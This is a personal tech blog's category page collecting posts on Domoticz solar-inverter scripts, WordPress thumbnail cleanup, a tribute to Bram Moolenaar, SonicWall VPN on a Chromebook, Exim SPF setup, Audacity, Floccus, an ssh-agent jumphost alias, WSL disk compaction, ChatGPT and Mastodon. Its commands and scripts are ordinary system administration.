Category: Tech

  • How to add the total of two solar inverters in Domoticz

    How to add the total of two solar inverters in Domoticz

    I have two inverters — a SolarEdge and a GroWatt — and I want to combine the gross kWh output of both in one graph, i.e. one Domoticz device.

    There are multiple ways to do this. Currently I have two different Domoticz devices that add the SolarEdge (via API) and GroWatt (via this script) output together. One device is called SumGenkWh and one called Total Today. They both give the same result, but the way of calculating is a bit different.

    10.6 kWh for both

    I spent way too long figuring this out, so this blog is for posterity.

    I actually found three ways to achieve this (the two devices above are the result of the first two); all solutions involve a DzVents script.

    The Domoticz forum pointed me in the right direction, but some details were missing.

    Method 1: Create a custom sensor

    This is the most straightforward method; I found it on the Domoticz forum. It is a generic custom sensor that simply acts like a dumb counter. If that is all you need, great!

    This is the DzVents script that adds the values to the sensor.

    return {
        on = {
            timer = {
                'every 5 minutes'
            },
        },
        execute = function(domoticz, device, timer)
            -- Replace the idx (or 'name') with your solar panel devices, or comment a line out if you don't use it
            local vandaagKwhzon = domoticz.devices(509).counterToday
            local vandaagKwhzon2 = domoticz.devices(514).counterToday

            -- Create a custom sensor with kWh as its axis label and replace the idx or 'name' with your device
            local zonTotaal = domoticz.devices(556)

            -- Calculate the total kWh
            local kwhOpbrengst = tonumber(domoticz.utils.round((vandaagKwhzon + vandaagKwhzon2), 2))

            -- Update the total custom sensor
            zonTotaal.updateCustomSensor(kwhOpbrengst)
        end
    }
    
    

    Method 2: Create a third (dummy) inverter

    Create a device with the subtype kWh. The difference from the first method is that this device acts like a generic inverter, because it’s an electricity device (not just a counter). This means you can get the values (Watt and kWh) from the other two inverters, add them in a script and use the updateElectricity method to update this dummy ‘inverter’ with the total Watt and kWh values.

    Note: do not use WhToday; this is where I spent too much time! Use WhActual and WhTotal. Also see here.

    You can see the difference between the first method and second method in the image below: one (555) acts like an actual inverter and the Data is the sum total of both inverters. The other (556) is just a counter.

    Here is the DzVents script:

    return {
        on = {
            timer = { 'every 5 minutes' }
        },
        execute = function(domoticz, item)
            
            local SE = domoticz.devices(509)
            local GW = domoticz.devices(514)
            local SEGW = domoticz.devices(555)
    
            -- Calculate combined values
            local combinedWhActual = (SE.WhActual or 0) + (GW.WhActual or 0)
            local combinedWhToday = (SE.WhToday or 0) + (GW.WhToday or 0)
            local combinedWhTotal = (SE.WhTotal or 0) + (GW.WhTotal or 0)
    
            -- Print combined values
            print("Combined WhActual:", combinedWhActual)
            print("Combined WhToday:", combinedWhToday)
            print("Combined WhTotal:", combinedWhTotal)
    
            -- Update SEGW device with combined values
            SEGW.updateElectricity(combinedWhActual, combinedWhTotal)
        end
    }
    

    Method 3: Sum of P1 delivery

    When you use a P1 interface, you can also get the values from the delivery phases that your P1 meter spits out to Domoticz. If you only have one phase, it’s literally the same graph as L1.

    If you have 3 phases (which you probably have when you have more than one inverter) you can of course add these phases together.

    I haven’t used this myself, but it shouldn’t be too difficult to add these values together with the use of the above scripts. It seems the value would be a little bit more precise.
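    I haven’t tried this, but a minimal sketch based on the scripts above could look like the following. The idx values 601/602/603 are placeholders for your own phase delivery devices, and which attribute you read (WhTotal, counterToday, etc.) depends on the device type your P1 creates in Domoticz.

    return {
        on = {
            timer = { 'every 5 minutes' }
        },
        execute = function(domoticz, item)
            -- Placeholder idx values: replace with the P1 delivery devices for your phases (L1/L2/L3)
            local L1 = domoticz.devices(601)
            local L2 = domoticz.devices(602)
            local L3 = domoticz.devices(603)

            -- Assumes kWh-type devices that expose WhTotal (see Method 2); adjust the attribute if yours differ
            local combinedWhTotal = (L1.WhTotal or 0) + (L2.WhTotal or 0) + (L3.WhTotal or 0)

            -- Write the total to a dummy device, e.g. the custom sensor from Method 1 (idx 556)
            domoticz.devices(556).updateCustomSensor(domoticz.utils.round(combinedWhTotal, 2))
        end
    }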

  • Manage your WordPress wp-content folder

    Manage your WordPress wp-content folder

    My other blog has around 900 posts with 1,700 images in my WordPress Media Library. But my wp-content folder has over 20,000 images!

    That folder looks like this:

    The wp-content folder is a mess

    What is happening here!?

    What’s happening of course, is that WordPress tries to do a little bit too much thinking for you. And it creates lots of image resolutions and sizes — called thumbnails — when you upload an image. In my case up to 8 extra images were created on each image upload.

    Note: Your WordPress Media Library will only show you one image, but under the hood there are (in my case) up to 8 images. You can only see them on your file system.

    Thumbnails

    I love WordPress, but I don’t need WordPress to do that, because I don’t want a million files idling on my server.

    They take up space and are (in my case) mostly useless.

    Because the images I upload are usually already small and compressed and my posts have maybe one or two images. And my readers have fast connections, so speed is not really a big deal.

    Of course YMMV, but for my theme and use case, I don’t need extra thumbnails.

    Here’s how I handle the images in my wp-content folder and how I got rid of all the unnecessary ones with these plugins.

    Disable thumbnails generation

    I use the Disable Generate Thumbnails plugin, because it’s the most straightforward.

    Very simple configuration

    I have also used ThumbPress as an alternative.

    Some of these sizes are theme dependent, some are based on the media settings, and others are hardcoded into WordPress.

    You can also add a bit of PHP code that does this for you. But I chose a plugin.
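    For reference, if you prefer the PHP route, a minimal sketch (not what I use, and assuming a reasonably recent WordPress) would be something like this in your theme’s functions.php:

    // Disable generation of all intermediate thumbnail sizes on upload
    add_filter( 'intermediate_image_sizes_advanced', function ( $sizes ) {
        return array();
    } );

    // Optionally also skip the scaled-down copy WordPress makes of very large images
    add_filter( 'big_image_size_threshold', '__return_false' );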

    Both plugins will stop WordPress from creating all these specific thumbnail sizes.

    Imsanity

    https://wordpress.org/plugins/imsanity

    Install Imsanity and select a max resolution. This means whatever image you upload, it will be scaled down to this max.

    • You can choose to keep the originals or not.
    • And you can choose to do a bulk resize.
    • And automatically convert PNG to JPG. Great.
    Imsanity

    Imsanity is also available per image from the Media List view, so you can resize individual images.

    You can use Imsanity with wp-cli to resize in bulk!

    wp imsanity resize

    Note: it seems that using wp-cli will not inform the media list, i.e. the GUI, of the resize. So your media list will still show the old size (and offer an option to scale it down, even though that has already been done).

    WP-Optimize

    https://wordpress.org/plugins/wp-optimize

    WP-Optimize will compress your images even further. This is handy when you already have uploaded lots of images.

    WP-Optimize

    Summary

    So with these three plugins:

    • Disable Generate Thumbnails: No new thumbs are created
    • Imsanity: Uploaded images are automatically scaled down
    • WP-Optimize: Compress existing and new images even further

    And now the big reveal. How to get rid of all these already created thumbnails!

    Force Regenerate Thumbnails

    Install Force Regenerate Thumbnails. This awesome plugin will regenerate new thumbs and DELETE existing thumbs based on your current settings (i.e. none if you have set ‘Disable Generate Thumbnails’).

    I.e. in my case it will create zero new thumbs and cleanly delete all the old ones!

    You run it by selecting one or more media files from your Media Library and choosing the Bulk action.

    Here you can see that it regenerated the thumbs for one image by deleting two existing sizes and creating none.

    Awesome!

    You can also see in the database that this plugin does a clean rewrite of the image metadata. This is absolutely necessary because if this doesn’t happen some themes will look for thumbs that are gone and you will end up with a blogpost with ‘missing’ images!

    Before
    After

    You can also do this with WP-CLI:

    wp media regenerate

    Handy if you want to run bulk actions.

    I would really love it if these three things were incorporated into one plugin or maybe even WordPress core (media regenerate more or less is). But I am happy this works and that I can keep control of my wp-content folder.

    Bonus: Media File Sizes

    It does what it says on the box. You can sort your Media Library based on size (this really should be a WordPress core feature).

    https://wordpress.org/plugins/media-file-sizes
  • The Legacy of Bram Moolenaar

    The Legacy of Bram Moolenaar

    This weekend we learned that Bram Moolenaar had passed away at the age of 62. And this news affected me more than I expected.

    Like so many: I did not know Bram personally. But I’ve been using a tool made by Bram for more than half my life — at least weekly, sometimes daily.

    That tool is a text editor. The best one there is: Vim.

    Bram Moolenaar (source: Wikipedia)

    Vim

    For those wondering: a text editor, what’s so special about that?

    Vim is not like any other piece of software. Vim is a special piece of software. The most apt description I could find is this one:

    Vim is a masterpiece, the gleaming precise machining tool from which so much of modernity was crafted.

    This description is not a hyperbole.

    Vim is the tool that was there when software took over the world. When modernity was created — i.e. everything we owe to computers — Vim was there.

    An essential tool to all of it.

    Like a power-drill, hammer or screwdriver, Vim is also a tool. A means, not an end. And a specific tool you must learn to use.

    And undoubtedly, various alternatives exist, yet Vim sets itself apart as a true precision instrument that, in the hands of adept users, has the power to craft exquisite and practical creations while eliciting immense pleasure and fulfillment in the process. Much like a skilled carpenter or watchmaker equipped with an array of specialized tools, Vim caters to those who engage earnestly with computers. Its seamless functionality and versatility provide a deeply gratifying experience, granting users the ability to shape their digital work with finesse and artistry.

    Another way to describe Vim is that Vim is a programmable editor. It’s the editor that you give commands — i.e. that you program — as you program.

    When you learn Vim, when you use Vim, when you create with Vim; it becomes an extension of you. It’s a way of working, but more importantly: a way of thinking. Being proficient in Vim means being able to work almost at the speed of thought. In a way, Vim is the closest thing to a neuralink we have.

    But this post is not about Vim (I highly recommend this video if you want to learn more), this post is about Bram.

    Bram

    Bram worked on Vim almost daily for over 30 years. Constantly tightening and improving it. An almost unprecedented achievement. A true labor of love.

    And you notice this when you use Vim. Everything works smoothly, it is fast and rock-solid. I can’t remember a single time in over 20 years when Vim froze or crashed.

    Vim, like many successful innovations, owes its origins to the contributions of those who came before. It stands on the shoulders of giants. It began as an imitation, derived from a port of a clone based on an idea by Bill Joy. However, Bram Moolenaar emerges as the true architect of Vim’s triumph and the evolution of vi-like editors. Bram is the giant on which they stand.

    Through Bram’s skillful craftsmanship, Vim has become an unparalleled piece of software that brings immense joy and satisfaction to its users. I vividly recall a moment 22 years ago when I had to ask someone how to close the editor, and the memory of that initial blush of shame has not faded entirely. And, even today, I find myself continuously discovering new features and capabilities in Vim, a testament to its rich and ever-expanding potential.

    Bram gave the world something very rich and powerful.

    And, Bram never asked for a penny for this. What Bram asked (at most) was to donate something, anything, to his foundation: ICCF Holland. In previous Vim versions, you would sometimes also see this friendly request when you started Vim.

    Vim’s code is open and free in the traditional sense, and Vim can be considered charity-ware, with its own license (which is compatible with GPL and more).

    And what all these little facts tell you is maybe all you need to know about Bram.

    And everything I’ve read over the past few days — here, here, here, here and here (and many more places) — about Bram confirms this image.

    The image of a hyperintelligent, dedicated, and selfless human-being.

    Someone who has made a major impact on the world of computer science.

    A Mensch.

    Someone who liked to share.

    (When I think of Bram I always think of his personal site where he shared his photos.)

    Sad

    Perhaps all these things add up to why it hit me when I read the news that Bram had passed away. In the message, his family made it clear that Bram was ill (‘a medical condition that progressed quickly over the last few weeks’). This was unknown to most people and made the news all the more surprising.

    And it made me even sadder when someone pointed out Bram’s recent GitHub activity.

    Source

    The activity slowly fades away. It’s like a bright light went out and no one noticed.

    Bram’s legacy

    Vim is so intertwined with everything I do that I never doubted for a second that I can continue to use Vim. But when you see the GitHub activity, you can’t escape the thought that Vim was Bram and Bram was Vim. And Bram was of course the Vim BDFL for a reason.

    When someone like Ian Murdock passed away, there were clear structures in place that never put Debian in jeopardy. And when Linus Torvalds dies, I expect it to be the same.

    But is that also the case with Vim – Bram’s life work? I read on the mailing list that a number of longtime contributors will continue Vim. Of course. But what strikes me is that even those people — who were so close to the project — did not know about Bram’s medical condition. That must have been Bram’s deliberate choice and let’s respect that. But it does raise questions about the future of Vim.

    Time will tell what happens next. But one thing is certain. Vim is not going away. And Bram’s legacy is not a GitHub activity chart. Bram and Vim’s spirit are everywhere. Whether it is in new emerging editors or in the letters j and k that show up in all kinds of unexpected places. Vim, the way of working, the way of thinking — the programmable editor — is an extremely powerful and valuable idea. One that’s been perfected by Bram and captured in the form of an almost perfect piece of software honed over 30 years. And even if Vim were to disappear, which I don’t expect, that idea is certainly not going to disappear. And that is Bram’s legacy.

    If you want to: please contribute and donate what you can in memory of Bram Moolenaar.

  • Using the SonicWall Connect Tunnel with Firefox on a Chromebook

    Yes, you read that correctly. Firefox on a Chromebook! Without tricks.

    Or at least, not many tricks.

    Why?

    When you want to use the SonicWall Connect Tunnel software (from the SMA 1000 Series) on your Chromebook the suggested SonicWall Mobile Connect app does not work properly. I don’t know why, but there is a solution.

    The solution

    In one sentence: install the (Java based) SonicWall VPN Connect Tunnel software and install Firefox in the Linux VM on your Chromebook.

    The result: Chrome and Firefox side by side with the Sonicwall Connect Tunnel.

    How?

    Here we go.

    Enable Linux virtual machine on your Chromebook: i.e. set up developer mode.

    This used to be a whole thing, now it is very easy.

    Just flip a switch in the settings. No joke.

    The screenshot is in Dutch, but go to Settings and then Developers

    Great! You now have an (almost) full-blown Linux OS at your disposal!

    You can do things.

    Next, start the Terminal app and select Penguin (this is the default name on a Chromebook for your Linux VM).

    Select
    Click it

    You get a prompt.

    Prompt

    Next, download the SonicWall Connect Tunnel from within your terminal with wget.

    Get the correct URL from here.

    wget https://software.sonicwall.com/CT-NX-VPNClients/CT-12.4.2/ConnectTunnel_Linux64-12.42.00664.tar

    It looks like this

    Unpack the downloaded file:

    tar -xvf ConnectTunnel_Linux64-12.42.00664.tar

    Install it:

    sudo ./install.sh

    Next, install the Java Runtime, you need this for the SonicWall VPN:

    sudo apt-get install default-jre

    Install a webbrowser:

    sudo apt-get install firefox-esr

    Now you can start the Sonicwall VPN:

    startctui

    You are presented with the familiar SonicWall tool. And after connecting to your VPN, you can start your browser from your terminal (start a new terminal tab, the other one has startctui running):

    firefox-esr

    Or just use the Chromebook global search to find and start the Firefox browser.

    Because Firefox is a GUI application installed in your container, Chrome somehow recognizes this and gives you the option to start it from the Chromebook menu and/or pin it to your dock.

    This does not work with the SonicWall GUI.

    And that’s it.

    The strange part is that Firefox is able to use the VPN connection, while your regular Chrome browser won’t. I figure this is probably for the same reason that the default SonicWall app does not work (maybe it does work with Firefox, something for you to try out!).

  • Correctly configuring incoming SPF in Exim on Debian

    The Debian documentation is sparse on how to correctly configure incoming SPF checks in the Debian Exim package.

    It is sparse in the sense that it tells you what to install (spf-tools-perl) but it is not clear WHERE to put the very important macro. It only says:

    This is provided via the macro CHECK_RCPT_SPF, set it to true.

    Fine, but where!?

    Answer: you should put this macro at the top of your configuration file (/etc/exim4/exim4.conf.template).

    At least that is what I did: I put it on line 23, after trying out different places.
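    For illustration, the top of my /etc/exim4/exim4.conf.template now contains something along these lines (the exact line number will differ):

    # near the top of /etc/exim4/exim4.conf.template, before the ACLs are defined
    CHECK_RCPT_SPF = true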

    Next, you run:
    update-exim4.conf
    /etc/init.d/exim4 restart

    And that’s it. I couldn’t find it anywhere so I put it here.

    More on SPF

    With this setting, Exim will check your incoming mail for valid SPF records. Because the check was not in place on my server, it was possible for spammers to tell my mailserver that they were sending mail on behalf of my mailserver!

    This is *not* what you want.

    SPF best practices

    When configuring this I also found I had a couple of mistakes in my SPF records.

    server.j11g.com instead of *.j11g.com
    1. I had set an SPF record on a wildcard (*.j11g.com) subdomain. But this does not work properly. Specify the subdomain, and configure the record.
    2. I was missing an MX record for the subdomain. Also set this specifically.
    3. There was an IPv6 error in my SPF record. A semicolon (of course). There are lots of sites to test your SPF records. Here is a good one and another. They will point out errors.
    4. I use an include in my SPF record. I am still not sure where to put it, but it looks like the best practice is to put it before the IP addresses. Like so:

      v=spf1 mx include:spf.solcon.nl ip4:157.90.24.20 ip4:212.84.154.148 ip6:2001:9e0:8606:8f00::/56 ip6:2a01:4f8:1c1c:79a1::/56 -all
    5. I switched from ~all to -all, to drop all mail that does not comply with the SPF record.

    Tests

    me@remoteserver:~# telnet server.j11g.com 25
    Trying 157.90.24.20...
    Connected to server.j11g.com.
    Escape character is '^]'.
    220 server.j11g.com ESMTP Exim 4.92 Sat, 22 Jul 2023 10:17:30 +0200
    ehlo jan.com
    250-server.j11g.com Hello remotemachine.test [77.72.*.*]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-CHUNKING
    250-STARTTLS
    250 HELP
    MAIL FROM:info@posthistorie.nl
    250 OK
    RCPT TO:janvdberg@gmail.com
    550 relay not permitted
    RCPT TO: jan@server.j11g.com
    550-[SPF] 77.72.150.187 is not allowed to send mail from posthistorie.nl. 
    550 Please see http://www.openspf.org/Why?scope=mfrom;identity=info@posthistorie.nl;ip=77.72.*.*

    The log on the server looks like this:

    2023-07-22 10:18:03 H=remoteserver (jan.com) [77.72.*.*] F=<info@posthistorie.nl> rejected RCPT janvdberg@gmail.com: relay not permitted
    2023-07-22 10:18:29 H=remoteserver (jan.com) [77.72.*.*] F=<info@posthistorie.nl> rejected RCPT jan@server.j11g.com: SPF check failed.
  • Audacity Tips

    Audacity Tips

    This is a public note to myself for working with Audacity, which I don’t do too often, and I want to make sure I don’t forget these things.

    I recently created a 5 hour music project: a DJ radio show.

    The finished project, it has 5 tracks with multiple audiofiles per track

    What I need from Audacity is:

    • Copy and paste audiofiles together (cut, split, trim files): easy enough. Audacity is very intuitive for these kinds of things.
    • Have a bit of background music (jingles/tunes) over someone talking: so align or layer tracks.
    • Fade tracks in and out.
    • Export to one big file.

    That’s mostly it.

    Audacity is a very powerful tool, but also great for just these few things.

    Tips

    The biggest challenge when working with different audiofiles is volume differences. So most of these tips revolve around making sure the volume is correct.

    Do not use the GAIN slider!

    Firstly: do NOT use the gain sliders (at the beginning of each track) to adjust volume. This will bite you in the butt later. Especially when you have lots of different audiofiles on one track (which I have).

    Do not touch this slider!

    This might work if you have maybe one or two tracks. But in my case, adding different audio files (with different volumes!) to the same track made the gain slider useless. This is the reason I have five tracks: I used the gain slider on one of the tracks in the beginning. I later found out that this was a dumb move, and it was too much work to retweak the volume of the audiofiles, so I left the gain as it was and started a new track.

    The tip is: use effects to change the volume of audiofiles!

    Note: For all of the effects to work you first need to select (part) of a track or audiofile.

    Effects: Amplify

    Amplify voice tracks (especially), and always use the recommended setting. Audacity knows how much it can amplify. Do this.

    Under Effect -> Volume and compression.

    Effects: Compressor

    Compress with -30 / -60 / 3:1 / 0.10 / 1.0. I picked these settings up from here.

    This will top off peaks, and boost your voice tracks to a maximum for much louder and clearer sound.

    Under Effect -> Volume and compression.

    Effects: Fade-in / Fade-out

    Use these to fade tracks in and out. Or crossfade tracks.

    Select part of a track and select either In or Out.

    Use longer or shorter stretches, listen to what sounds right.

    Effects: Normalize

    If you want to reduce volume, use this. Play around with the setting. Again: do not use the gain sliders. The great thing is (as with most effects) you can use it on parts of an audiofile. Just select the part you want to normalize or amplify.

    Also: see the Envelope Tool below (I only learned about this tool after finishing my project).

    Export to MP3

    I use the default settings. Audacity does the mix for you when you export your project (File->Export->Export as MP3). So I don’t mix everything down to one file before exporting (Tracks->Mix), there is no reason and you can’t really tweak your project anymore afterwards.

    Overall Audacity does a good job of creating a good mix.

    Things I later learned

    After I finished the project I was pretty happy with the result but I picked up two new tips from this great YouTube video:

    I have not used the next two effects, but for a next project I definitely might.

    Effects: Auto Duck

    Duck part of a track so the volume is lower. Great for voice-overs.

    Auto Duck

    Envelope Tool

    With the Envelope Tool (F2) you can drag and slide the volume of an audio file. Amazing.

    Envelope Tool

    One thing I wish I knew

    Audacity is really good, I love it. There is one thing, however, that I am pretty sure there is a shortcut for, but I have not figured it out yet.

    When cutting an audiofile at the end or beginning (which I did a lot near the end of the project), the length of the audiofile shrinks and the audiofile MOVES to fill the newly created gap! But every other track/audiofile after does not move. So I wish I knew how to automatically move ALL tracks and audiofiles over to fill the newly created gap all while keeping all the tracks correctly aligned.

    What I do now is (after the cut) select everything (with my mouse) and move it to fill the gap. Seems there should be an easier way to do this.

  • Floccus is the bookmark manager you have been looking for

    Floccus is the bookmark manager you have been looking for

    Floccus does exactly what you want because Floccus doesn’t break your bookmark management flow.

    The flow being: adding, changing, removing, moving bookmarks *in* your browser, straight from the bookmark bar and with the shortcuts you already know.

    Because Floccus is nothing more than a browser extension.

    Screenshot of the Floccus Chrome extension

    How does it work?

    Floccus is actually not a bookmark manager — because your browser does that already!

    FLOCCUS IS JUST A SYNC TOOL.

    Floccus periodically makes an .xml file of all your bookmarks (the bookmarks, the bookmark folders, the positions etc.). All the bookmarks that you see on your bookmark bar.

    And the MAGIC is that it stores and syncs this file on a central location: WebDav, Nextcloud or Google Drive (I use this).

    It works like this.

    You connect the Floccus extension to your Google Drive in one browser; this is your Floccus account. Now you can export this account (a JSON file) and import it in all your other browsers.

    Import and export screen: a one time setup

    The Floccus extension that sits in all your browsers does nothing more than periodically sync this file and merge changes (when necessary): new bookmarks or deletions will sync to all browsers because the Floccus extension “manages” the bookmarks (based on the xml file).

    That’s it.

    It’s so elegant and simple that at first I didn’t get it. Sure there are options available for sync behavior, sync interval, folder mapping, setting a passphrase and more. But for most people the defaults are fine.

    I use Floccus to sync two browsers (Brave @ work and Chrome @ home) and I absolutely love it! All my bookmarks are available on any browser I use (Chromium, Google Chrome, Mozilla Firefox, Opera, Brave, Vivaldi and Microsoft Edge are all supported).

    Floccus is the bookmark “manager” I have been looking for!

  • Simple jumphost ssh-agent config

    You can find many tutorials online on how to use ssh-agent or ssh-ident correctly.

    This is a short and simple two line fix aimed at a specific use case, i.e. a single connection to a jumphost.

    Add this to your .bashrc

    alias jump='eval $(ssh-agent) && ssh-add ~/.ssh/id_rsa && ssh -A -i ~/.ssh/id_rsa jan@jumphost.domain.name'

    So now when you type jump:

    • An ssh-agent will start
    • Relevant keys are added to the agent
    • You ssh to the jumphost with agent forwarding (-A)

    And from the jumphost you can ssh connect to anywhere because you forwarded your keys.
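    For example, a session then looks roughly like this (the internal hostname is just an example):

    $ jump                                # starts an agent, adds your key (asks the passphrase once) and connects
    jan@jumphost:~$ ssh internal-server   # works, because your agent is forwarded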

    Possible drawbacks:

    • The primary benefit is that with this method your ssh keys stay on your local machine (and not on e.g. the jumphost). But it also means you still have to enter your ssh passphrase for each session. In my case this is not a problem: I usually need one session to my jumphost. If you set up lots of sessions, this may be a problem because you have to keep entering your passphrase (usually one of the reasons for running ssh-agent in the first place) and every session starts its own ssh-agent.
      If you do not use an ssh passphrase this is not an issue (though you really should use a passphrase).
    • Your ssh-agent will run forever. So add this to ~/.bash_logout
    pkill ssh-agent

    Drawbacks:

    • *Any* bash logout will kill your ssh-agent. Again: not a problem if you just use one session at a time.

    This setup works for quick access from, let’s say, a secondary machine to my jumphost, to quickly check some things. On my primary machine (for real work) I just use this.

  • Compact WSL partition and reclaim storage space

    Start PowerShell

    wsl --shutdown

    Find where your WSL vhdx file is located. Usually under:

    C:\Users\yourname\AppData\Local\Packages\Linuxdistroflavour\LocalState\ext4.vhdx

    Start diskpart (from PowerShell or CMD): diskpart.exe

    Run:

    select vdisk file="C:\Users\Jan van den Berg\AppData\Local\Packages\TheDebianProject.DebianGNULinux_76v4gfsz19hv4\LocalState\ext4.vhdx"

    and next:

    compact vdisk
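    Put together, the whole session looks roughly like this (the vhdx path is shortened here; use your own):

    PS> wsl --shutdown
    PS> diskpart
    DISKPART> select vdisk file="C:\Users\yourname\AppData\Local\Packages\...\LocalState\ext4.vhdx"
    DISKPART> compact vdisk
    DISKPART> exit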

  • I don’t understand terminals, shells and SSH

    Confession time: I don’t fully understand how terminals, shells and SSH really work (and my guess is you don’t either). And I don’t mean the cryptography behind SSH. I mean how SSH and the terminal — and the shell for that matter — interact with one another.

    I recently realized that even though I’ve been daily remotely logging into Linux systems for all of my adult life (and type in the shell and Vim) I didn’t really grasp how these things actually work.

    Of course I conceptually know what a (virtual) terminal is (entering input and displaying output) and what the shell is for (the interpreter). And SSH is the remote login protocol, right? (Or is SSH a pseudoterminal inside another pseudoterminal, who’s to say)?

    The distinction between these three elements is a bit fuzzy and I do not have a clear concept of it in my head. The test being: could I draw it on a whiteboard? Or: could I explain it to a novice? The answer is probably: not really.

    So I went on a bender and found these four (well-known) links that explain things like tty, raw mode, ptmx/pts, pseudoterminals and more.

    This post functions as a bookmark placeholder. I will add more links when I find them.

    There’s lots of information here if you’re interested. And of course: you mostly don’t actually need to know any of these things to do your work — we are all forever standing on the shoulders of giants. But I *want* to understand these things. And I think I understand them a little bit better now. Maybe you will as well.

  • ChatGPT and humans as prompt fodder

    ChatGPT and humans as prompt fodder

    I woke up Sunday morning with an unnerving feeling. A feeling something had changed. A disturbance in the force if you will.

    I know that look

    Mainstream media seems blissfully unaware of what happened. Sure, here in the Netherlands we had a small but passionate demonstration on primetime TV, but e.g. the NY Times so far has *nothing* 🦗🦗

    But something most definitely happened. My personal internet bubble has erupted the last few days with tweets and blogposts and it was the top story on every tech site I visit. I have never seen so many people’s minds blown at the same time. It has been called the end of the college paper as well as the end of Google. Things will never be the same. Or so they say.

    Top three

    I am of course talking about ChatGPT by OpenAI, which is based on GPT-3. It’s not AGI, but it’s definitely a glimpse of the future.

    This post is to gather some thoughts and …. to test this thing.

    When GPT-2 came out a few years ago it was impressive, but not in an earth shattering kind of way. Because you could still place it on a scale of linear progress. That this thing existed made sense. And it was mostly fun and also a bit quirky. People experimented with it, but the hype died down soon enough iirc. This was however the prelude.

    GPT-3 was already lurking around the corner and promised to be better. Much better. How much? From what we can see now in the ChatGPT implementation the differences are vast. It is not even in the same ballpark. It is a gigantic leap forward. To do justice to the difference with GPT-2, GPT-3000 would be a better name than the current one.

    GPT-3000

    Deceptively mundane start screen

    The impressiveness is twofold:

    • The correctness. ChatGPT all feels very real, lifelike, usable or whatever you want to call it. The quality of output is off the charts. It will surpass any expectations you might have.
    • The breadth. There seems to be no limit to what it can do. Prose, tests, chess, poetry, dances (not quite yet), business strategy analysis, generating code or finding errors in code or even running virtual machines (!?) and simulating a BBS. It can seemingly do anything that is text related; if you are creative enough to make it do something.

    Sure it’s just ‘a machine learning system that has been trained to generate text and answer questions’. But this goes a long way (of course there are also critical voices).

    And for the record: I was surprised by a lot of examples I saw floating online. Even though I shouldn’t have been.

    Unlike any other technology that came before, GPT-3 announces loud and clear that the age of AGI is upon us. And here is the thing; I don’t know how to feel about it! Let alone try and imagine GPT-4. Because this is only the beginning.

    GPT-3 is proof that any technology that can be developed, will be developed. It shares this characteristic with every other technology. But there is another famous human technology it shares a specific characteristic with i.e. the atomic bomb. The characteristic being: just because we could, doesn’t always mean we should.

    This guy knows

    But alas, technology doesn’t wait for ethics debates to settle down.

    And now it’s here, let’s deal with it.

    First thoughts

    I am no Luddite, though I am very much a believer that new things are not necessarily better, just because they’re new. But with GPT-3 I do feel like a Luddite because I can’t shake the feeling we are on the brink of losing something. And in some cases — within a matter of days — we have already lost something; which was ultimately inevitable and also happened extremely fast.

    Me?

    People have always been resistant or hesitant when new tools arrive. Take the first cameras — or decades after those, the digital cameras — instead of seeing possibilities, people initially felt threatened. Which is a very human reaction to new things that challenge the old way of doing things. It’s the well-known paradoxical relation we have with innovation of tools. Paradoxical, because in the end the new tools mostly always win. As they should. Tools are what makes us human, it’s what separates us from almost every other living being. Tools pave the way forward.

    And this is just another tool. Right?

    But here is the crux. Somehow this seems to be more than just a tool. The difference being that the defining characteristic of a tool is that it enhances human productivity and GPT-3 seems to hint at replacing human productivity.

    Decades of hypothetically toying and wrestling with this very theme (i.e. can AI replace humans?) in sci-fi has all of a sudden become a very real topic for a lot of people.

    No, I do not think it is sentient. But it can do an awful lot.

    The future belongs to optimists

    Let’s try and look at the arrival of GPT-3 from an optimistic perspective (yes, this could be a GPT-3 prompt). My optimistic approach is that GPT-3 (and AGI next) will force us to become more human. Or even better: it will show us what it means to be human.

    Because GPT-3 can do everything else and do it better (for argument’s sake, let’s just assume that better is better and steer away from philosophical debate about what better even means).

    GPT-3 will cause the bottom to fall out of mediocrity, leaving only the very best humans have to offer. Anything else can be generated.

    So what is that very best that makes us human? What is it that we can do exclusively, that AGI can never do? What is so distinctly human that AGI can never replicate it?

    One of the first things that came to mind for me was whether AGI could write something like Infinite Jest or Crime and Punishment. Literature. Earthshattering works of art that simultaneously define and enhance the human experience. Literature in my opinion is the prime example of the ultimate human experience. Could AGI … before even finishing this question: yes, yes it could.

    Is that a bad thing?

    What we’re seeing is the infinite monkey theorem in action. AGI can and will produce Shakespeare. The data is there. We have enough monkeys and typewriters.

    Not a typewriter. But you know the scene.

    As long as you feed it enough data it can do anything. But who feeds it data? Humans (for now). I am not ready to think what happens when AI starts to talk to AI (remember Her?). For now it feeds and learns from human input.

    What are you smiling about?

    Maybe AGI is where we find out we are just prompt fodder and humans are not so special after all? Maybe that’s why I woke up with an unnerving feeling.

    The proof is in the pudding

    Or maybe, it is because ChatGPT could enhance everything I have written so far and make it more clear and concise.

    Because it definitely can.

    Of course I tried this and it gave the following suggestions.

    First part

    The blog post was too long so I had to cut it in two parts.

    I agree

    Second part

    The first paragraph here is actually the eighth, etc.

    This is good advice

    I have chosen to keep the original text as-is with the screenshot suggestions so you can see the difference.

    It is really good. What more can I say?

  • Five things I’d like to see in Mastodon

    I love Mastodon. I am a believer.

    Not that I think it will replace Twitter or anything like that. But it is definitely its own thing. True to the original ideas of the internet.

    There are however a few things I would really like to see. In no particular order.

    Threads

    Threads in the timeline feel clunky. I see replies to long running threads scattered through my timeline. They are hard to follow and they make the timeline messy. Threads should be bundled together more coherently in my timeline.

    Algorithm

    There I said it. I *do* think there is room for an algorithm on Mastodon. Specifically one that is proposed by jefftk in his blogpost ‘User-Controlled Algorithmic Feeds’.

    It makes a lot of sense since the user is in control.

    Hover for profile

    Easy one I think. I want to hover over a (profile)name and get a popup with the most relevant information for that profile without going to that profile! I don’t want to leave my timeline. It’s since switching to Mastodon that I noticed how much I rely on this (also see: Verification 👇).

    Advanced View

    Could be more advanced. I want different (more!) and persistent columns for different hashtags or searches.

    Verification

    Sure rel=me is one way to verify. But with more and more brands and people moving to Mastodon I’d like to see another (better?) way to verify accounts. Not everyone has their own site.

    But, this is hard. Also see bird-site. And I also don’t have a solution.

    I do like presscheck.org though. It’s a good effort. But I worry how this scales.


  • How to get green links on your Mastodon profile with WordPress

    How to get green links on your Mastodon profile with WordPress

    The green links on your Mastodon profile indicate that you are the owner of that link i.e. that website.

    You can achieve this by adding a little line of code to your website (see Link verification).

    When you have a basic HTML website, adding this piece of code is trivial.
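    For a plain HTML site it is essentially one link back to your Mastodon profile with the me relation, for example (URL is a placeholder):

    <a rel="me" href="https://mastodon.example/@you">Mastodon</a>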

    However when your site runs on WordPress, it’s a bit different.

